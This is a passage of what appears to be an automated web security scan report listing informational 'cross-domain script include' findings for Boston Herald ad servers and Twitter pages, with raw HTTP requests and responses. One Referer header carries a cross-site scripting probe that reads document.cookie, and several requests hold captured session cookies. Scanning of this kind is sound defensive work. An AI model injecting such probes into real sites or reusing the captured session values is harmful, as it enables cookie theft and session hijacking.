Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.56.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:00:14 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P1021J4T; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1415
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618?" type="text/javascript"></script>
...[SNIP]...

18.308. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O3021J48|P2021J4T|P1021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.134.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:47:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O3021J48|P2021J4T|P2021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1407
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/454587819/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=454587819?" type="text/javascript"></script>
...[SNIP]...

18.309. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P2021J4T|P1021J4m; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.101.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:01:55 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O3021J48|P2021J4T|P1021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1408
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/710762294/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=710762294?" type="text/javascript"></script>
...[SNIP]...

18.310. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:17 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1415
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?" type="text/javascript"></script>
...[SNIP]...

18.311. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.312. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P1021J4T; NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.89.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:45:22 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O2021J48|P2021J4T|P1021J4m; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1414
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?" type="text/javascript"></script>
...[SNIP]...

18.313. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.314. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.carfind.com/1222741686@Top1,Right1,Right2,Right3? HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://boston30.autochooser.com/results.asp?6bfd0%3balert(document.cookie)//cb19586ae74=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:24:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1639
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_w
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.315. http://scores.heraldinteractive.com/merge/tsnform.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scores.heraldinteractive.com
Path:   /merge/tsnform.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season= HTTP/1.1
Host: scores.heraldinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 05:21:36 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q0fm5255ct1r00ncq153f045; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Sports - BostonHerald.c
...[SNIP]...
</div>

<script language="JavaScript1.1" src="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@x01!x01"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.316. http://twitter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-35616-58920
ETag: "ce84c6d523ac490f74725d4e72e7cdcf"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-Runtime: 0.01412
Content-Type: text/html; charset=utf-8
Content-Length: 44218
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

18.317. http://twitter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225096-73325-20685
ETag: "28966c2e8cd7a0cf5cb06ed4fc8bc5a3"
Last-Modified: Fri, 28 Jan 2011 14:31:36 GMT
X-Runtime: 0.01128
Content-Type: text/html; charset=utf-8
Content-Length: 44208
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

18.318. http://twitter.com/247realmedia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /247realmedia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /247realmedia HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234368-40068-57715
ETag: "f2ddcf301113c2efcb23646f68ea6493"
Last-Modified: Fri, 28 Jan 2011 17:06:08 GMT
X-Runtime: 0.01625
Content-Type: text/html; charset=utf-8
Content-Length: 49998
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.319. http://twitter.com/AddThis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /AddThis

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /AddThis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
